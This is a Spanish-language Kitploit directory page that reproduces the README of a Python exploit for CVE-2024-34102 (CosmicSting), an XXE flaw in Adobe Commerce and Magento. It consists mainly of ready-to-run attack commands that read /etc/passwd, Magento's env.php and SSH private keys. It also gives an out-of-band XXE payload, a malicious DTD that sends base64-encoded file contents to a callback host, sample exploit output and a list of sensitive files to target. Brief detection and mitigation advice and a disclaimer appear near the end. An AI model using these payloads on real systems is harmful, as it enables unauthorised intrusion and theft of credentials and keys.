Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-34102 — Exploit para CVE-2024-34102 en python3 | Kitploit
Herramientas/GitHubGitHub/nmmorette/cve-2024-34102
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

Exploit para CVE-2024-34102 en python3

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-34102 - Exploit XXE CosmicSting

Python Version CVE

Exploit para CVE-2024-34102 (CosmicSting) - Vulnerabilidad de XXE (XML External Entity) en Adobe Commerce y Magento.

📋 Acerca de la vulnerabilidad

CVE-2024-34102 es una vulnerabilidad crítica de XXE (XML External Entity) que afecta a:

  • Adobe Commerce versiones 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 y anteriores
  • Magento Open Source (mismas versiones)

Esta vulnerabilidad permite a un atacante no autenticado:

  • 📄 Leer archivos arbitrarios del servidor
  • 🔐 Exfiltrar credenciales y configuraciones sensibles
  • 💾 Acceder a información de la base de datos
  • 🚨 Ejecutar código arbitrario (en algunos escenarios)

Puntuación CVSS: 9.8 (Crítica)

🎯 Créditos

Este exploit se basa en el trabajo original de:

  • @Chocapikk - CVE-2024-34102 original

Mejoras en esta versión:

  • ✅ Servidor DTD dinámico personalizado (evita la dependencia de fars.ee)
  • ✅ Servidor de callback con decodificación automática
  • ✅ Validación de parámetros requeridos
  • ✅ Lógica de reintentos para servicios externos
  • ✅ Mensajes de error más descriptivos
  • ✅ Soporte HTTPS para callbacks
  • ✅ Compatibilidad total con Python 3.8+

🛠️ Requisitos

  • Python 3.8 o superior
  • Acceso a un servidor para alojar archivos DTD (VPS, Burp Collaborator, etc.)
  • Servicio de callback (Burp Collaborator, Oastify o servidor propio)

📦 Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102

# Instalar dependencias
pip install -r requirements.txt

🚀 Uso

Método 1: Usando fars.ee (automático)

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com

Método 2: Usando tu propio servidor DTD

Terminal 1 - Servidor DTD:

root@kitploit:~
sudo python3 server_dtd.py

Terminal 2 - Exploit:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com \
  --dtd-server YOUR-IP:8000

Método 3: Con tu propio servidor de callback

Terminal 1 - Servidor DTD:

root@kitploit:~
sudo python3 server_dtd.py

Terminal 2 - Servidor de Callback (auto-decodifica):

root@kitploit:~
sudo python3 callback_server.py

Terminal 3 - Exploit:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c YOUR-CALLBACK-IP \
  --dtd-server YOUR-DTD-IP:8000

📝 Parámetros

Requeridos:

  • -u, --url - URL objetivo (dominio base)
  • -f, --file - Archivo a leer del servidor (ej., /etc/passwd)
  • -c, --callback - Servidor de callback (IP/dominio)

Opcionales:

  • --dtd-server - Servidor personalizado para alojar el archivo DTD
  • --https - Usar HTTPS para el callback (por defecto: HTTP)

🎬 Ejemplos

Leer /etc/passwd

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /etc/passwd \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Leer configuración de Magento

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /var/www/html/app/etc/env.php \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Leer claves SSH

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /home/ubuntu/.ssh/id_rsa \
  -c abc123.burpcollaborator.net \
  --dtd-server 192.168.1.100:8000 \
  --https

🔍 Cómo funciona

1. XXE Out-of-Band

El exploit utiliza la técnica XXE Out-of-Band para exfiltrar datos:

root@kitploit:~
<!-- Payload enviado al objetivo -->
<!DOCTYPE r [
  <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

2. DTD externo

El servidor objetivo descarga el DTD malicioso:

root@kitploit:~
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">

3. Exfiltración

El servidor procesa el XML, lee el archivo, lo codifica en base64 y lo envía al callback:

root@kitploit:~
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...

4. Decodificación

root@kitploit:~
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d

📊 Ejemplo de salida

root@kitploit:~
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http

DTD will be dynamically generated with:
[*]   Callback: http://abc123.oastify.com
[*]   File: /etc/passwd

DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...

=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>

To decode the exfiltrated data:
[*]   echo 'BASE64_STRING' | base64 -d

[!] Check your Burp Collaborator or Oastify dashboard now!

🛡️ Detección y Mitigación

Para Defensores:

Detección:

  • Monitorear solicitudes HTTP a los endpoints /rest/V1/guest-carts/*/estimate-shipping-methods
  • Alertar sobre payloads XML con entidades externas (<!ENTITY>)
  • Detectar conexiones salientes a dominios sospechosos

Mitigación:

  • Actualizar a versiones parcheadas:
    • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
  • Deshabilitar el procesamiento de entidades externas en el parser XML
  • Implementar WAF con reglas anti-XXE

Para Pentesters:

Archivos interesantes para probar:

root@kitploit:~
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ

⚖️ Aviso Legal

root@kitploit:~
Este exploit se proporciona únicamente con fines educativos y de investigación de seguridad.

Usar este código para probar sistemas sin autorización explícita es ILEGAL.

Eres el ÚNICO responsable de tus acciones. Úsalo solo en:
✅ Tus propios entornos de prueba
✅ Programas de bug bounty autorizados
✅ Pruebas de penetración contratadas

NO lo uses en:
❌ Sistemas sin autorización
❌ Entornos de producción sin permiso
❌ Cualquier actividad maliciosa

El autor no es responsable del mal uso de este código.

📚 Referencias

  • Boletín de seguridad de Adobe APSB24-40
  • Detalles del CVE-2024-34102
  • Prevención de XXE de OWASP
  • Exploit original de Chocapikk

⭐ Si este proyecto te fue útil, ¡considera darle una estrella!

Descargar herramienta